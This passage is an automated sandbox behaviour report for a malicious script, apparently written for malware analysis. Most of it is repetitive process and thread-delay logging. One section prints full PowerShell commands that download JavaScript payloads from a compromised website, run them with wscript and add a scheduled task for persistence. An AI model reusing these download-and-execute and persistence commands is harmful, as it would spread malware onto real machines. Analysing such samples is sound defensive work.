      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4657Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5151Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4050Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4708Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3693
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5232
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1419
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -15679732462653109s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: wscript.exe, 0000000B.00000002.2300523427.0000017912264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: powershell.exe, 00000000.00000002.1751935615.00000173B2093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.1882266470.0000026AC68D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2447829274.000001E7F07E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7332.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -comman [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $oezdnwd8hg1rxrns6ya = new-object net.webclient; $cio = $oezdnwd8hg1rxrns6ya.downloaddata('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php'); $oezdnwd8hg1rxrns6ya.downloadfile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php', 'evqtmldasrmzuk.js'); schtasks /create /sc minute /mo 1 /f /tr ([system.text.encoding]::utf8.getstring($cio) + $env:tmp + '\' + ('evqtmldasrmzuk.js ' * 2)) /tn za3xqiywq;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\v58w09daljek.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn evqtmldasrmzuk.js /f; wscript $env:programdata\v58w09daljek.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
